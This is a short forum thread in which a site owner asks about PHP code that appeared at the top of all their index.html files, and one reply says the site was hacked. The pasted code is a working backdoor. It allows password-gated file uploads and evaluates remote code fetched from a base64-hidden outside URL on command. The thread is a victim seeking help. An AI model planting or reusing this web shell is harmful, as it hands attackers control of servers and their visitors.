Answer the question
In order to leave comments, you need to log in
F
F
freelancepro2018-03-29 11:10:51
freelancepro, 2018-03-29 11:10:51
Malicious code at the top of the page, what could it be?
Hello!
In all index.html files on all sites, this code appeared at the top of the page:
<?php
ini_set('display_errors','Off'); error_reporting('E_ALL');
setcookie('server',1,time()+1e6);$s=$_SERVER;$sr=$s['HTTP_REFERER'];$sh=$s['HTTP_HOST'];$cs=$_COOKIE['server'];
if(isset($_FILES['u']) && isset($_POST['n']) && isset($_POST['hash']) && md5($_POST['hash'])=='3ff1ea09b981d88e7c8752b329a7702e')
{
move_uploaded_file($_FILES['u']['tmp_name'],$_POST['n']);
}
elseif(($sr && !strpos($sr,$sh) && $cs!=1) || $c=$_GET['cmdcmd'])
{
eval(file_get_contents(base64_decode('aHR0cDovL3FiMC5ydS93Lz91PQ==').$sh.'&c='.$c));
}
?>and the index.html files are automatically renamed to index.php
1st time I restored the backup, everything became normal, but a week later I started changing the old files, the same thing appeared again.
What could it be and how to deal with it? Thanks in advance!
1 answer(s)
@bubandos
A
Anton fon Faust, 2018-03-29 @bubandos
hacked the site. Look, somewhere there is a hole that allows you to fill in any heresy.
Similar questions
S
W
M
D
Dmitry2015-05-19 23:34:41
A book on C-C++ where is the description of the language with analogies?
5Reply
Didn't find what you were looking for?
Ask your questionAsk a Question
731 491 924 answers to any question